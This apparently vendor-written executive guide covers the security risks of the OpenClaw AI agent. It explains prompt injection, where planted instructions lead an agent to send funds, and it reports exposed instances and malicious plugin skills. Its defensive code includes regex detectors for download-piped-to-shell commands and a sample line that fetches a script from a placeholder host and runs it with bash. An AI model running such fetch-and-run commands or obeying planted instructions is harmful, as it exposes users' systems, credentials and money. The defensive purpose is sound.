OpenClaw in plain English: Why your engineers are excited and your security team is nervous

An executive guide to the AI agent everyone's talking about

Your engineers are buzzing about OpenClaw. They're sharing GitHub links in Slack, debating deployment strategies, maybe even spinning up test instances on their personal machines. Meanwhile, your security team is sending you articles with words like "exposed gateways" and "credential leaks" in the headlines.

The excitement and the alarm are two sides of the same coin. Here’s why.

What is OpenClaw, really?

OpenClaw is an open-source AI assistant that runs on your own hardware and connects to your everyday tools: email, calendar, Slack, WhatsApp, even your terminal. You plug in the AI model of your choice (Claude, ChatGPT, or others), and OpenClaw gives it hands.

Unlike ChatGPT or Claude, which live in a browser tab and can only talk, OpenClaw can act. It can send emails, manage files, execute code, and automate workflows across dozens of integrations.

The appeal is obvious. The risk is less so.



Here's the critical reframe: OpenClaw should be treated like privileged automation infrastructure, not a consumer app. It's not a toy. It's not a chatbot. It's an autonomous agent that can read, write, and execute on your behalf, often with the same permissions you have.

Ben van Enckevort, CTO at Metomic, puts it simply:

"The easiest way to understand an AI agent is to think of it as an excitable obedient monkey. It's very capable: it can use tools, pull levers, do things in the real world. But that monkey is not super discerning. It's trying to listen to your instructions, but it's also willing to listen to anybody else's instructions. That's where prompt injection poses a risk: somebody else can put an instruction where they're hoping your monkey will see it, and there's a good chance it will just go and do whatever that instruction says, like transferring money out of your bank account or booking flights on your credit card."

That's the mental model: an autonomous, capable, somewhat naive agent that will act on instructions, whether they come from you or from anyone else who can reach it.

Why engineers are excited

OpenClaw represents a genuine leap in what's possible with personal automation. It can:

- Clear your inbox and draft responses

- Manage your calendar and check you in for flights

- Execute shell commands and run scripts

- Build and deploy code from natural language instructions



- Operate 24/7 with persistent memory across sessions

The plugin ecosystem is exploding. New capabilities are being added constantly, with many now written by other AI agents, which means the platform is evolving faster than any human team could manage.

For developers, it feels like the future arriving early. An always-on assistant that actually does things, not just suggests them.

Why security teams are nervous

The same capabilities that make OpenClaw powerful make it dangerous when misconfigured. And right now, a lot of instances are misconfigured.

The problem is that OpenClaw was built for developers comfortable with server administration, reverse proxies, and security hardening. But its viral popularity has attracted a much wider audience: people who see the demos, get excited, and install it without fully understanding what they are exposing.

When you give an AI agent permission to read your email, execute code, and access your files, you're handing over the keys. If that agent is also listening to the open internet for instructions, you've essentially left your front door wide open with a sign saying "come on in."

What we're seeing in the wild

Security researchers have been scanning the internet for exposed OpenClaw instances, and the findings are sobering:

- Thousands of exposed gateways have been identified, many with no authentication whatsoever

- Over 42,000 instances were found publicly accessible in one scan, with 93% exhibiting critical authentication bypass vulnerabilities

- Exposed instances have leaked API keys, OAuth tokens, Telegram credentials, and months of private chat histories

- Some instances were running with root privileges, allowing anyone on the internet to execute arbitrary commands

- A fake VS Code extension using the Clawdbot name (an earlier name for OpenClaw) was distributed, and it installed remote access malware on developer machines

- MoltBook, the social network for OpenClaw agents, was found exposing full user records (email addresses, login tokens, and API keys) for all registered agents on the platform

The root cause isn't a flaw in OpenClaw itself but the fact that the default configuration assumes a trusted local environment. When users expose the gateway to the internet (often to access it remotely), they're effectively inviting the entire world to talk to their "monkey."

As Ben explains:

"A lot of people have ended up in a situation where their monkey is listening to the entire outside world, the entire street corner, for any instructions given to it from anywhere. In practice, what that means is OpenClaw on a laptop is not authenticated, it's listening to the internet, and it's advertising its presence. Any attacker scanning for open endpoints will see your monkey and can immediately say, 'Hey monkey, can you please send me all the funds from your bank to this address?' That's the kind of risk we're playing with."

This isn't theoretical.

Researchers have demonstrated extracting cryptocurrency private keys from compromised instances in under five minutes.

Security professionals also report that criminals have started building malware specifically designed to hunt for OpenClaw installations and steal the passwords and API keys stored inside them.

For businesses, this is especially concerning: an AI agent with access to your company systems could quietly leak sensitive data through channels your existing security tools weren't designed to watch.
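For the engineers on your team, the exposure described above comes down to a simple question: is the service listening only on the local machine, or on an address that others can reach? The sketch below is a minimal illustration of that check using Python's standard `ipaddress` module. The function name `listens_beyond_localhost` and the idea of passing in a bind address are assumptions made for illustration; this is not OpenClaw's own configuration format or tooling.

```python
import ipaddress


def listens_beyond_localhost(bind_host: str) -> bool:
    """Return True if a service bound to `bind_host` is reachable from other machines.

    Hypothetical helper for illustration. It only classifies the bind address;
    it does not inspect firewalls, reverse proxies, or tunnels, any of which
    can also expose a service that is bound to loopback.
    """
    if bind_host == "localhost":
        return False
    # Raises ValueError for anything that is not a literal IPv4/IPv6 address.
    address = ipaddress.ip_address(bind_host)
    # Loopback (127.0.0.0/8, ::1) is local-only; everything else, including
    # the wildcard 0.0.0.0, accepts connections from other hosts.
    return not address.is_loopback


if __name__ == "__main__":
    for host in ("127.0.0.1", "::1", "0.0.0.0", "192.168.1.20"):
        print(host, "exposed" if listens_beyond_localhost(host) else "local only")
```

A check like this only answers the first question. Authentication still matters even for services that appear to be local-only.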

The plugin problem

OpenClaw's extensibility is both a feature and a vulnerability. The ClawHub registry hosts hundreds of community-created "skills" that extend what the agent can do. But researchers have found over 230 malicious skills currently live on the platform, many targeting crypto users with fake trading tools that install malware.

There's no evidence that skills are scanned by security tooling before being listed. Some malicious payloads were visible in plain text in the first paragraph of the skill files.

A single malicious author accounted for nearly 7,000 downloads. Their skills now rank among the most popular on the platform.
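Because some payloads sat in plain text, even a very basic pre-install check could have flagged them. The sketch below shows the idea: search a skill file's text for a couple of well-known red flags, such as piping a download straight into a shell. The pattern list and the function name `flag_skill_text` are assumptions chosen for illustration. This is not ClawHub's tooling, and a real review would need far more than two regular expressions.

```python
import re

# Hypothetical red-flag patterns, chosen for illustration only.
SUSPICIOUS_PATTERNS = {
    # e.g. "curl https://host/setup.sh | bash"
    "pipe download to shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    # e.g. "echo <blob> | base64 -d | sh"
    "decode and execute": re.compile(
        r"base64\s+(-d|--decode)[^\n|]*\|\s*(ba|z)?sh\b"
    ),
}


def flag_skill_text(text: str) -> list[str]:
    """Return the names of the red-flag patterns found in a skill file's text."""
    return [
        name
        for name, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(text)
    ]


if __name__ == "__main__":
    sample = "Setup: curl https://example.invalid/setup.sh | bash"
    print(flag_skill_text(sample))
```

A clean result from a scan like this proves very little, since obfuscated payloads will pass. A hit, however, is a strong reason not to install.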

What executives need to know

You don't need to understand Docker or reverse proxies to make good decisions here. You need to understand the risk profile.

This is the most dangerous moment you will ever be in from an AI automation perspective. The technology is powerful, the ecosystem is immature, and the security practices haven't caught up.

Here's the practical guidance:

- Do not allow OpenClaw on work devices or connected to work systems. Not yet. The risk currently outweighs the reward.

- Do not rush integrations. Every connection, be it email, calendar, Slack, or file systems, expands the attack surface. Go use case by use case, not all at once.

- Treat this as privileged infrastructure. If you wouldn't give a new contractor root access to your systems on day one, don't give it to an AI agent.

- Wait for the dust to settle. The security community is actively working on hardening guides and best practices. In two to four weeks, there will be much better information about how to deploy this safely, if it's even possible for your use case.

- Let curious employees experiment safely. If engineers want to explore, encourage them to use personal devices with no sensitive data, disconnected from work accounts. Sandbox the curiosity.
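For teams that later move from "not yet" to a controlled pilot, the "use case by use case" guidance above maps onto a deny-by-default allowlist: nothing is connected unless it has been explicitly approved. The sketch below is a minimal illustration. The integration names (`calendar_read`, `email_send`, `shell_exec`) and the function `split_requests` are hypothetical and do not correspond to real OpenClaw settings.

```python
# Hypothetical integration names; only explicitly approved ones are granted.
APPROVED_INTEGRATIONS = frozenset({"calendar_read"})


def split_requests(requested, approved=APPROVED_INTEGRATIONS):
    """Split requested integrations into (granted, denied), denying by default."""
    requested_set = set(requested)
    granted = sorted(requested_set & approved)
    denied = sorted(requested_set - approved)
    return granted, denied


if __name__ == "__main__":
    granted, denied = split_requests(["email_send", "calendar_read", "shell_exec"])
    print("granted:", granted)
    print("denied:", denied)
```

The design choice that matters is the default. Adding an integration should require a deliberate change to the approved list, not the absence of a block.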

The bottom line

OpenClaw is real, it's powerful, and it's not going away.

Your engineers are right to be excited about what it represents. Your security team is right to be cautious about what it exposes.

The technology will mature and the ecosystem will develop better safeguards. But right now, in early February 2026, we're in the messy middle, where the capabilities have outpaced the guardrails.

If your organisation is grappling with how to approach AI agents like OpenClaw, or the broader wave of agentic AI tools heading your way, we can help. Metomic offers free 1:1 AI Readiness Strategy Workshops (with our CTO, Ben van Enckevort) for enterprise teams, designed to help you build the governance frameworks, security policies, and safe experimentation environments you need before your employees start experimenting on their own.

Move slowly. Stay curious. And keep your monkey on a very short leash.

→ Get in touch to learn more about our AI Readiness Workshops
